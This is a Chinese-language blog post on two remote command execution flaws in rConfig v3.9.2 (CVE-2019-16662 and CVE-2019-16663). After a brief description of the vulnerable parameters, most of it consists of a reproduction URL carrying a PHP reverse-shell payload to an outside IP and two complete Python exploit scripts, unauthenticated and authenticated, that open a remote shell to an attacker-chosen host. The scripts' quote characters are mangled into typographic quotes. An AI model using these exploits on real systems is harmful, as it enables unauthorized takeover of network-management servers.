(CVE-2019-16662)(CVE-2019-16663)rConfig_v3.9.2_远程命令执行

# (CVE-2019-16662)(CVE-2019-16663)rConfig v3.9.2 远程命令执行

=======================

一、漏洞简介
————

我在两个文件中分别发现了两个远程代码执行漏洞。第一个是ajaxServerSettingsChk.php,攻击者可以通过rootUname参数发送精心构造的一个GET请求,触发未授权RCE漏洞。rootUname参数在源文件第2行中定义,随后会在第13行传递给exec函数,攻击者可以构造参数接收内容实现让操作系统执行恶意命令。这个漏洞很容易利用和发现,后面的篇幅中我将介绍如何发现并利用这个漏洞。

第二个漏洞是在search.crud.php发现的,这文件需要通过身份验证才能触发远程代码执行漏洞。这个漏洞可以通过构造一个包含有两个参数的GET请求触发,其中searchTerm参数可以包含任意值,但该参数必须存在,才能执行到第63行的exec函数。

二、漏洞影响
————

rConfig v3.9.2

三、复现过程
————

https://www.0-sec.org/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=`php -r ‘$sock=fsockopen(“1.2.3.4”,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’`

![](/static/qingy/(CVE-2019-16662)(CVE-2019-16663)rConfig_v3.9.2_远程命令执行/img/rId24.png)

pyton脚本一

#!/usr/bin/python

# Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-16662
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 4:
print “[+] Usage : ./exploit.py target ip port”
exit()

target = sys.argv[1]

ip = sys.argv[2]

port = sys.argv[3]

payload = quote(”’;php -r ‘$sock=fsockopen(“{0}”,{1});exec(“/bin/sh -i <&3 >&3 2>&3″);’#”’.format(ip, port))

install_path = target + “/install”

req = requests.get(install_path, verify=False)
if req.status_code == 404:
print “[-] Installation directory not found!”
print “[-] Exploitation failed !”
exit()
elif req.status_code == 200:
print “[+] Installation directory found!”
url_to_send = target + “/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=” + payload

print “[+] Triggering the payload”
print “[+] Check your listener !”

requests.get(url_to_send, verify=False)

![](/static/qingy/(CVE-2019-16662)(CVE-2019-16663)rConfig_v3.9.2_远程命令执行/img/rId25.png)

python脚本二

#!/usr/bin/python

# Exploit Title: rConfig v3.9.2 Authenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-16663
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
print “[+] Usage : ./exploit.py target username password ip port”
exit()

target = sys.argv[1]

username = sys.argv[2]

password = sys.argv[3]

ip = sys.argv[4]

port = sys.argv[5]

request = requests.session()

login_info = {
“user”: username,
“pass”: password,
“sublogin”: 1
}

login_request = request.post(
target+”/lib/crud/userprocess.php”,
login_info,
verify=False,
allow_redirects=True
)

dashboard_request = request.get(target+”/dashboard.php”, allow_redirects=False)

if dashboard_request.status_code == 200:
print “[+] LoggedIn successfully”
payload = ”'””&&php -r ‘$sock=fsockopen(“{0}”,{1});exec(“/bin/sh -i <&3 >&3 2>&3″);’#”’.format(ip, port)
encoded_request = target+”/lib/crud/search.crud.php?searchTerm=anything&catCommand={0}”.format(quote(payload))
print “[+] triggering the payload”
print “[+] Check your listener !”
exploit_req = request.get(encoded_request)

elif dashboard_request.status_code == 302:
print “[-] Wrong credentials !”
exit()

![](/static/qingy/(CVE-2019-16662)(CVE-2019-16663)rConfig_v3.9.2_远程命令执行/img/rId26.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容